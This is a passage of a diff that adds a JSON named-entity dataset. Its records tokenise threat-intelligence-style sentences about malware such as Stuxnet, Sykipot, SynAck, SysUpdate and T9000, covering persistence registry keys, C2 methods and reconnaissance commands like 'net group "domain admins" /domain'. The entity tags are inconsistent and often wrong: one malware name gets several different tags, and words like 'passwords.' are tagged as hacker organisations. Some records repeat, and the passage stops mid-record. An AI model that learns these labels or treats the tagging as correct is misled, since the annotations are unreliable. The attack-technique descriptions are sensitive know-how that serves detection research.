[ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "infects", + "remote", + "servers", + "via", + "network", + "shares", + "and", + "by", + "infecting", + "WinCC", + "database", + "views", + "with", + "malicious", + "code." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "extracts", + "and", + "writes", + "driver", + "files", + "that", + "match", + "the", + "times", + "of", + "other", + "legitimate", + "files." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "attempts", + "to", + "impersonate", + "an", + "anonymous", + "token", + "to", + "enumerate", + "bindings", + "in", + "the", + "service", + "control", + "manager." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "uses", + "HTTP", + "to", + "communicate", + "with", + "a", + "command", + "and", + "control", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "used", + "WMI", + "with", + "an", + "<code>explorer.exe</code>", + "token", + "to", + "execute", + "on", + "a", + "remote", + "share." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stuxnet", + "uses", + "a", + "driver", + "registered", + "as", + "a", + "boot", + "start", + "service", + "as", + "the", + "main", + "load-point." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sykipot", + "uses", + "SSL", + "for", + "encrypting", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sykipot", + "may", + "use", + "<code>net", + "group", + "\"domain", + "admins\"", + "/domain</code>", + "to", + "display", + "accounts", + "in", + "the", + "\"domain", + "admins\"", + "permissions", + "group", + "and", + "<code>net", + "localgroup", + "\"administrators\"</code>", + "to", + "list", + "local", + "system", + "administrator", + "group", + "membership." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sykipot", + "injects", + "itself", + "into", + "running", + "instances", + "of", + "outlook.exe,", + "iexplore.exe,", + "or", + "firefox.exe." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Sykipot", + "contains", + "keylogging", + "functionality", + "to", + "steal", + "passwords." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Sykipot", + "is", + "known", + "to", + "contain", + "functionality", + "that", + "enables", + "targeting", + "of", + "smart", + "card", + "technologies", + "to", + "proxy", + "authentication", + "for", + "connections", + "to", + "restricted", + "network", + "resources", + "using", + "detected", + "hardware", + "tokens." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Features", + "B-Purp", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sykipot", + "may", + "gather", + "a", + "list", + "of", + "running", + "processes", + "by", + "running", + "<code>tasklist", + "/v</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sykipot", + "has", + "been", + "known", + "to", + "establish", + "persistence", + "by", + "adding", + "programs", + "to", + "the", + "Run", + "Registry", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sykipot", + "may", + "use", + "<code>net", + "view", + "/domain</code>", + "to", + "display", + "hostnames", + "of", + "available", + "systems", + "on", + "a", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sykipot", + "may", + "use", + "<code>ipconfig", + "/all</code>", + "to", + "gather", + "system", + "network", + "configuration", + "details." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Sykipot", + "may", + "use", + "<code>netstat", + "-ano</code>", + "to", + "display", + "active", + "network", + "connections." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sykipot", + "may", + "use", + "<code>net", + "start</code>", + "to", + "display", + "running", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SynAck", + "clears", + "event", + "logs." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SynAck", + "encrypts", + "the", + "victims", + "machine", + "followed", + "by", + "asking", + "the", + "victim", + "to", + "pay", + "a", + "ransom." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SynAck", + "checks", + "its", + "directory", + "location", + "in", + "an", + "attempt", + "to", + "avoid", + "launching", + "in", + "a", + "sandbox." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SynAck", + "can", + "manipulate", + "Registry", + "keys." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "SynAck", + "parses", + "the", + "export", + "tables", + "of", + "system", + "DLLs", + "to", + "locate", + "and", + "call", + "various", + "Windows", + "API", + "functions." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "SynAck", + "payloads", + "are", + "obfuscated", + "prior", + "to", + "compilation", + "to", + "inhibit", + "analysis", + "and/or", + "reverse", + "engineering." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SynAck", + "enumerates", + "all", + "running", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SynAck", + "abuses", + "NTFS", + "transactions", + "to", + "launch", + "and", + "conceal", + "malicious", + "processes." + ], + "ner_tags": [ + "B-Way", + "I-Way", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SynAck", + "enumerates", + "Registry", + "keys", + "associated", + "with", + "event", + "logs." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SynAck", + "checks", + "its", + "directory", + "location", + "in", + "an", + "attempt", + "to", + "avoid", + "launching", + "in", + "a", + "sandbox." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SynAck", + "gathers", + "computer", + "names,", + "OS", + "version", + "info,", + "and", + "also", + "checks", + "installed", + "keyboard", + "layouts", + "to", + "estimate", + "if", + "it", + "has", + "been", + "launched", + "from", + "a", + "certain", + "list", + "of", + "countries." + ], + "ner_tags": [ + "B-Time", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SynAck", + "lists", + "all", + "the", + "keyboard", + "layouts", + "installed", + "on", + "the", + "victim’s", + "system", + "using", + "<code>GetKeyboardLayoutList</code>", + "API", + "and", + "checks", + "against", + "a", + "hardcoded", + "language", + "code", + "list.", + "If", + "a", + "match", + "if", + "found,", + "SynAck", + "sleeps", + "for", + "300", + "seconds", + "and", + "then", + "exits", + "without", + "encrypting", + "files." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SynAck", + "gathers", + "user", + "names", + "from", + "infected", + "hosts." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SynAck", + "enumerates", + "all", + "running", + "services." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "Sys10", + "collects", + "the", + "group", + "name", + "of", + "the", + "logged-in", + "user", + "and", + "sends", + "it", + "to", + "the", + "C2." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sys10", + "uses", + "an", + "XOR", + "0x1", + "loop", + "to", + "encrypt", + "its", + "C2", + "domain." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sys10", + "collects", + "the", + "computer", + "name,", + "OS", + "versioning", + "information,", + "and", + "OS", + "install", + "date", + "and", + "sends", + "the", + "information", + "to", + "the", + "C2." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sys10", + "collects", + "the", + "local", + "IP", + "address", + "of", + "the", + "victim", + "and", + "sends", + "it", + "to", + "the", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sys10", + "collects", + "the", + "account", + "name", + "of", + "the", + "logged-in", + "user", + "and", + "sends", + "it", + "to", + "the", + "C2." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sys10", + "uses", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "has", + "been", + "signed", + "with", + "stolen", + "digital", + "certificates." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "load", + "DLLs", + "through", + "vulnerable", + "legitimate", + "executables." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "has", + "used", + "DNS", + "TXT", + "requests", + "as", + "for", + "its", + "C2", + "communication." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "collect", + "information", + "and", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "deobfuscate", + "packed", + "binaries", + "in", + "memory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "encrypt", + "and", + "encode", + "its", + "configuration", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "has", + "exfiltrated", + "data", + "over", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "delete", + "its", + "configuration", + "file", + "from", + "the", + "targeted", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "search", + "files", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "store", + "its", + "encoded", + "configuration", + "file", + "within", + "<code>Software\\Classes\\scConfig</code>", + "in", + "either", + "<code>HKEY_LOCAL_MACHINE</code>", + "or", + "<code>HKEY_CURRENT_USER</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "SysUpdate", + "has", + "the", + "ability", + "to", + "set", + "file", + "attributes", + "to", + "hidden." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "has", + "the", + "ability", + "to", + "download", + "files", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "contact", + "the", + "DNS", + "server", + "operated", + "by", + "Google", + "as", + "part", + "of", + "its", + "C2", + "establishment", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "has", + "named", + "their", + "unit", + "configuration", + "file", + "similarly", + "to", + "other", + "unit", + "files", + "residing", + "in", + "the", + "same", + "directory,", + "`/usr/lib/systemd/system/`,", + "to", + "appear", + "benign." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "write", + "its", + "configuration", + "file", + "to", + "<code>Software\\Classes\\scConfig</code>", + "in", + "either", + "<code>HKEY_LOCAL_MACHINE</code>", + "or", + "<code>HKEY_CURRENT_USER</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "call", + "the", + "`GetNetworkParams`", + "API", + "as", + "part", + "of", + "its", + "C2", + "establishment", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "collect", + "information", + "about", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "use", + "a", + "Registry", + "Run", + "key", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "has", + "the", + "ability", + "to", + "capture", + "screenshots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "manage", + "services", + "and", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "has", + "been", + "packed", + "with", + "VMProtect." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "SysUpdate", + "has", + "used", + "Base64", + "to", + "encode", + "its", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "has", + "used", + "DES", + "to", + "encrypt", + "all", + "C2", + "communications." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "collect", + "a", + "system's", + "architecture,", + "operating", + "system", + "version,", + "hostname,", + "and", + "drive", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "collected", + "the", + "IP", + "address", + "and", + "domain", + "name", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "collect", + "the", + "username", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "collect", + "a", + "list", + "of", + "services", + "on", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "copy", + "a", + "script", + "to", + "the", + "user", + "owned", + "`/usr/lib/systemd/system/`", + "directory", + "with", + "a", + "symlink", + "mapped", + "to", + "a", + "`root`", + "owned", + "directory,", + "`/etc/ystem/system`,", + "in", + "the", + "unit", + "configuration", + "file's", + "`ExecStart`", + "directive", + "to", + "establish", + "persistence", + "and", + "elevate", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "use", + "WMI", + "for", + "execution", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "can", + "create", + "a", + "service", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Systeminfo", + "can", + "be", + "used", + "to", + "gather", + "information", + "about", + "the", + "operating", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "a", + "victim", + "meets", + "certain", + "criteria,", + "T9000", + "uses", + "the", + "AppInit_DLL", + "functionality", + "to", + "achieve", + "persistence", + "by", + "ensuring", + "that", + "every", + "user", + "mode", + "process", + "that", + "is", + "spawned", + "will", + "load", + "its", + "malicious", + "DLL,", + "ResN32.dll.", + "It", + "does", + "this", + "by", + "creating", + "the", + "following", + "Registry", + "keys:", + "<code>HKLM\\Software\\Microsoft\\Windows", + "NT\\CurrentVersion\\Windows\\AppInit_DLLs", + "–", + "%APPDATA%\\Intel\\ResN32.dll</code>", + "and", + "<code>HKLM\\Software\\Microsoft\\Windows", + "NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs", + "–", + "0x1</code>." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "T9000", + "encrypts", + "collected", + "data", + "using", + "a", + "single", + "byte", + "XOR", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "T9000", + "uses", + "the", + "Skype", + "API", + "to", + "record", + "audio", + "and", + "video", + "calls.", + "It", + "writes", + "encrypted", + "data", + "to", + "<code>%APPDATA%\\Intel\\Skype</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "T9000", + "searches", + "removable", + "storage", + "devices", + "for", + "files", + "with", + "a", + "pre-defined", + "list", + "of", + "file", + "extensions", + "(e.g.", + "*", + ".doc,", + "*.ppt,", + "*.xls,", + "*.docx,", + "*.pptx,", + "*.xlsx).", + "Any", + "matching", + "files", + "are", + "encrypted", + "and", + "written", + "to", + "a", + "local", + "user", + "directory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "T9000", + "installation", + "process,", + "it", + "drops", + "a", + "copy", + "of", + "the", + "legitimate", + "Microsoft", + "binary", + "igfxtray.exe.", + "The", + "executable", + "contains", + "a", + "side-loading", + "weakness", + "which", + "is", + "used", + "to", + "load", + "a", + "portion", + "of", + "the", + "malware." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "T9000", + "searches", + "through", + "connected", + "drives", + "for", + "removable", + "storage", + "devices." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "T9000", + "can", + "take", + "screenshots", + "of", + "the", + "desktop", + "and", + "target", + "application", + "windows,", + "saving", + "them", + "to", + "user", + "directories", + "as", + "one", + "byte", + "XOR", + "encrypted", + ".dat", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "T9000", + "performs", + "checks", + "for", + "various", + "antivirus", + "and", + "security", + "products", + "during", + "installation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "T9000", + "gathers", + "and", + "beacons", + "the", + "operating", + "system", + "build", + "number", + "and", + "CPU", + "Architecture", + "(32-bit/64-bit)", + "during", + "installation." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "T9000", + "gathers", + "and", + "beacons", + "the", + "MAC", + "and", + "IP", + "addresses", + "during", + "installation." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "T9000", + "gathers", + "and", + "beacons", + "the", + "username", + "of", + "the", + "logged", + "in", + "account", + "during", + "installation.", + "It", + "will", + "also", + "gather", + "the", + "username", + "of", + "running", + "processes", + "to", + "determine", + "if", + "it", + "is", + "running", + "as", + "SYSTEM." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "T9000", + "gathers", + "and", + "beacons", + "the", + "system", + "time", + "during", + "installation." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "I-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "T9000", + "uses", + "the", + "Skype", + "API", + "to", + "record", + "audio", + "and", + "video", + "calls.", + "It", + "writes", + "encrypted", + "data", + "to", + "<code>%APPDATA%\\Intel\\Skype</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TAINTEDSCRIBE", + "has", + "used", + "<code>FileReadZipSend</code>", + "to", + "compress", + "a", + "file", + "and", + "send", + "to", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TAINTEDSCRIBE", + "can", + "execute", + "<code>FileRecvWriteRand</code>", + "to", + "append", + "random", + "bytes", + "to", + "the", + "end", + "of", + "a", + "file", + "received", + "from", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TAINTEDSCRIBE", + "can", + "randomly", + "pick", + "one", + "of", + "five", + "hard-coded", + "IP", + "addresses", + "for", + "C2", + "communication;", + "if", + "one", + "of", + "the", + "IP", + "fails,", + "it", + "will", + "wait", + "60", + "seconds", + "and", + "then", + "try", + "another", + "IP", + "address." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TAINTEDSCRIBE", + "can", + "delete", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TAINTEDSCRIBE", + "can", + "use", + "<code>DirectoryList</code>", + "to", + "enumerate", + "files", + "in", + "a", + "specified", + "directory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TAINTEDSCRIBE", + "can", + "download", + "additional", + "modules", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "TAINTEDSCRIBE", + "main", + "executable", + "has", + "disguised", + "itself", + "as", + "Microsoft’s", + "Narrator." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "TAINTEDSCRIBE", + "can", + "execute", + "<code>ProcessList</code>", + "for", + "process", + "discovery." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TAINTEDSCRIBE", + "has", + "used", + "FakeTLS", + "for", + "session", + "authentication." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TAINTEDSCRIBE", + "can", + "copy", + "itself", + "into", + "the", + "current", + "user’s", + "Startup", + "folder", + "as", + "“Narrator.exe”", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + 